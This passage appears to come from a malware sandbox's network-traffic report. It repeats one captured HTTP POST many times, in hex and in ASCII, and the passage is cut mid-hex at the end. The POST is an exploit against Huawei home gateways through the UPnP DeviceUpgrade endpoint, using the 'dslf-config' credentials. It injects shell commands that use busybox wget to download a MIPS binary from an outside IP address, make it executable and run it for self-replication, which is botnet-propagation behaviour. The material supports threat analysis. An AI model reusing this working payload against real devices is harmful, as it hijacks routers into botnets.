75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 